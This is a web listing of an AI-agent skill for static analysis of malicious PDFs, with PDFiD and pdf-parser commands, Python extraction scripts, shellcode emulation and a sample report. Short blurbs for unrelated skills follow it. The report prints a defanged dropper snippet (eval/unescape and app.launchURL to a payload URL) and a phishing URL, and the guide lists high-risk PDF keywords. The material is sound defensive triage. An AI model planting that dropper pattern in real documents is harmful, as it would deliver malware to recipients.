SKILLS/analyzing-pdf-malware-with-pdfid/SKILL.md
Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded JavaScript, shellcode, exploits, and suspicious objects without opening the document. Determines the attack vector and extracts embedded payloads for further analysis. Activates for requests involving PDF malware analysis, malicious document analysis, PDF exploit investigation, or suspicious attachment triage.
npx skillsauth add pinkpixel-dev/skills-collection-1 analyzing-pdf-malware-with-pdfidInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
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Do not use for analyzing the rendered visual content of a PDF; this is for structural analysis of the PDF file format for malicious objects.
pip install pdfid pdf-parser)pip install peepdf)Scan the PDF for suspicious keywords and structures:
# Run PDFiD to identify suspicious elements
pdfid suspect.pdf
# Expected output analysis:
# /JS - JavaScript (HIGH risk)
# /JavaScript - JavaScript object (HIGH risk)
# /AA - Auto-Action triggered on open (HIGH risk)
# /OpenAction - Action on document open (HIGH risk)
# /Launch - Launch external application (HIGH risk)
# /EmbeddedFile - Embedded file (MEDIUM risk)
# /RichMedia - Flash content (MEDIUM risk)
# /ObjStm - Object stream (used for obfuscation)
# /URI - URL reference (contextual risk)
# /AcroForm - Interactive form (MEDIUM risk)
# Run with extra detail
pdfid -e suspect.pdf
# Run with disarming (rename suspicious keywords)
pdfid -d suspect.pdf
PDFiD Risk Assessment:
━━━━━━━━━━━━━━━━━━━━━
HIGH RISK indicators (any count > 0):
/JS, /JavaScript -> Embedded JavaScript code
/AA -> Automatic Action (triggers without user interaction)
/OpenAction -> Code runs when document is opened
/Launch -> Can launch external executables
/JBIG2Decode -> Associated with CVE-2009-0658 exploit
MEDIUM RISK indicators:
/EmbeddedFile -> Contains embedded files (could be EXE/DLL)
/RichMedia -> Flash/multimedia (Flash exploits)
/AcroForm -> Form with possible submit action
/XFA -> XML Forms Architecture (complex attack surface)
LOW RISK indicators:
/ObjStm -> Object streams (obfuscation technique)
/URI -> External URL references
/Page -> Number of pages (context only)
Examine suspicious objects identified by PDFiD:
# List all objects referencing JavaScript
pdf-parser --search "/JavaScript" suspect.pdf
pdf-parser --search "/JS" suspect.pdf
# List all objects with OpenAction
pdf-parser --search "/OpenAction" suspect.pdf
# Extract a specific object by ID (example: object 5)
pdf-parser --object 5 suspect.pdf
# Extract and decompress stream content
pdf-parser --object 5 --filter --raw suspect.pdf
# Search for embedded files
pdf-parser --search "/EmbeddedFile" suspect.pdf
# List all objects with their types
pdf-parser --stats suspect.pdf
Pull out JavaScript code from PDF objects:
# Extract JavaScript using pdf-parser
pdf-parser --search "/JS" --raw --filter suspect.pdf > extracted_js.txt
# Alternative: Use peepdf for interactive JavaScript extraction
peepdf -f -i suspect.pdf << 'EOF'
js_analyse
EOF
# peepdf interactive commands for JS analysis:
# js_analyse - Extract and show all JavaScript code
# js_beautify - Format extracted JavaScript
# js_eval <object> - Evaluate JavaScript in sandboxed environment
# object <id> - Display object content
# rawobject <id> - Display raw object bytes
# stream <id> - Display decompressed stream
# offsets - Show object offsets in file
# Python script for comprehensive PDF JavaScript extraction
import subprocess
import re
# Extract all streams and search for JavaScript
result = subprocess.run(
["pdf-parser", "--stats", "suspect.pdf"],
capture_output=True, text=True
)
# Find object IDs containing JavaScript references
js_objects = []
for line in result.stdout.split('\n'):
if '/JavaScript' in line or '/JS' in line:
obj_id = re.search(r'obj (\d+)', line)
if obj_id:
js_objects.append(obj_id.group(1))
# Extract each JavaScript-containing object
for obj_id in js_objects:
result = subprocess.run(
["pdf-parser", "--object", obj_id, "--filter", "--raw", "suspect.pdf"],
capture_output=True, text=True
)
print(f"\n=== Object {obj_id} ===")
print(result.stdout[:2000])
Extract and examine shellcode from PDF exploits:
# Extract raw stream data for shellcode analysis
pdf-parser --object 7 --filter --raw --dump shellcode.bin suspect.pdf
# Analyze shellcode with scdbg (shellcode debugger)
scdbg /f shellcode.bin
# Alternative: Use speakeasy for shellcode emulation
python3 -c "
import speakeasy
se = speakeasy.Speakeasy()
sc_addr = se.load_shellcode('shellcode.bin', arch='x86')
se.run_shellcode(sc_addr, count=1000)
# Review API calls made by shellcode
for event in se.get_report()['api_calls']:
print(f\"{event['api']}: {event['args']}\")
"
# Use CyberChef to decode hex/base64 encoded shellcode
# Input: Extracted stream data
# Recipe: From Hex -> Disassemble x86
Pull out embedded executables and linked resources:
# Extract embedded files from PDF
import subprocess
import hashlib
# Find embedded file objects
result = subprocess.run(
["pdf-parser", "--search", "/EmbeddedFile", "--raw", "--filter", "suspect.pdf"],
capture_output=True
)
# Extract embedded PE files by searching for MZ header
with open("suspect.pdf", "rb") as f:
data = f.read()
# Search for embedded PE files
offset = 0
while True:
pos = data.find(b'MZ', offset)
if pos == -1:
break
# Verify PE signature
if pos + 0x3C < len(data):
pe_offset = int.from_bytes(data[pos+0x3C:pos+0x40], 'little')
if pos + pe_offset + 2 < len(data) and data[pos+pe_offset:pos+pe_offset+2] == b'PE':
print(f"Embedded PE found at offset 0x{pos:X}")
# Extract (estimate size or use PE header)
embedded = data[pos:pos+100000] # Initial extraction
sha256 = hashlib.sha256(embedded).hexdigest()
with open(f"embedded_{pos:X}.exe", "wb") as out:
out.write(embedded)
print(f" SHA-256: {sha256}")
offset = pos + 1
# Extract URLs from PDF
result = subprocess.run(
["pdf-parser", "--search", "/URI", "--raw", "suspect.pdf"],
capture_output=True, text=True
)
urls = re.findall(r'(https?://[^\s<>"]+)', result.stdout)
for url in set(urls):
print(f"URL: {url}")
Document all findings from the PDF analysis:
Analysis should cover:
- PDFiD triage results (suspicious keyword counts)
- PDF structure anomalies (object streams, cross-reference issues)
- Extracted JavaScript code (deobfuscated if needed)
- Shellcode analysis results (API calls, network indicators)
- Embedded files extracted with hashes
- URLs and external references
- CVE identification if a known exploit is detected
- YARA rule matches against known PDF malware families
| Term | Definition | |------|------------| | PDF Object | Basic building block of a PDF file; objects can contain streams (compressed data), dictionaries, arrays, and references to other objects | | OpenAction | PDF dictionary entry specifying an action to execute when the document is opened; commonly used to trigger JavaScript exploits | | PDF Stream | Compressed data within a PDF object that can contain JavaScript, images, embedded files, or shellcode; typically FlateDecode compressed | | FlateDecode | Zlib/deflate compression filter applied to PDF streams; must be decompressed to analyze contents | | ObjStm (Object Stream) | PDF feature storing multiple objects within a single compressed stream; used by malware to hide suspicious objects from simple parsers | | JBIG2 | Image compression standard in PDFs; historical source of exploits (CVE-2009-0658, CVE-2021-30860 FORCEDENTRY) | | PDF JavaScript API | Adobe-specific JavaScript extensions available in PDF documents for form manipulation, network access, and OS interaction |
Context: Email gateway flagged a PDF attachment with suspicious JavaScript indicators. The security team needs to determine if it contains an exploit or a social engineering redirect.
Approach:
Pitfalls:
PDF MALWARE ANALYSIS REPORT
==============================
File: invoice_2025.pdf
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
File Size: 45,312 bytes
PDF Version: 1.7
PDFID TRIAGE
/JS: 1 [HIGH RISK]
/JavaScript: 1 [HIGH RISK]
/OpenAction: 1 [HIGH RISK]
/EmbeddedFile: 0
/Launch: 0
/URI: 2
/Page: 1
/ObjStm: 1 [OBFUSCATION]
SUSPICIOUS OBJECTS
Object 5: /OpenAction -> references Object 8
Object 8: /JavaScript stream (FlateDecode, 2,847 bytes decompressed)
Object 12: /ObjStm containing objects 15-18
EXTRACTED JAVASCRIPT
Layer 1: eval(unescape("%68%65%6C%6C%6F"))
Layer 2: var url = "hxxp://malicious[.]com/payload.exe";
app.launchURL(url, true);
// Social engineering redirect, not exploit
EXTRACTED IOCs
URLs: hxxp://malicious[.]com/payload.exe
hxxps://fake-login[.]com/adobe/verify
Domains: malicious[.]com, fake-login[.]com
CLASSIFICATION
Type: Social Engineering (URL redirect)
CVE: None (no exploit code detected)
Risk: HIGH (downloads executable payload)
Family: Generic PDF Dropper
testing
When the user wants a full ASO health audit, review their App Store listing quality, or diagnose why their app isn't ranking. Also use when the user mentions "ASO audit", "ASO score", "why am I not ranking", "listing review", or "optimize my app store page". For keyword-specific research, see keyword-research. For metadata writing, see metadata-optimization.
testing
Clarify requirements before implementing. Use when serious doubts arise.
tools
Complete reference and build guide for ASI:One (ASI1) — the AI platform by Fetch.ai built for agentic, Web3-native applications. Use this skill IMMEDIATELY and ALWAYS when the user mentions ASI1, ASI:One, Fetch.ai AI API, building with ASI1, integrating ASI:One, asking about ASI1 models, tool calling with ASI1, ASI1 image generation, ASI1 agentic LLM, Agentverse, uagents, Agent Chat Protocol, structured output with ASI1, or OpenAI-compatible wrappers for ASI1. Also trigger when the user says things like "use ASI1 instead of OpenAI", "build an app with ASI:One", "ASI1 API", or references docs.asi1.ai. This skill covers everything needed to build production apps - setup, all models, all API features, tool calling, image gen, agentic orchestration, structured data, session management, streaming, LangChain integration, uagents / Agent Chat Protocol, and TypeScript/Node.js patterns.
data-ai
When the user wants to analyze their own app's actual performance data from App Store Connect — real downloads, revenue, IAP, subscriptions, trials, or country breakdowns synced via Appeeky Connect. Use when the user asks about "my downloads", "my revenue", "how is my app performing", "ASC data", "sales and trends", "my subscription numbers", "App Store Connect metrics", or wants to compare periods or top markets. For third-party app estimates, see app-analytics. For subscription analytics depth, see monetization-strategy.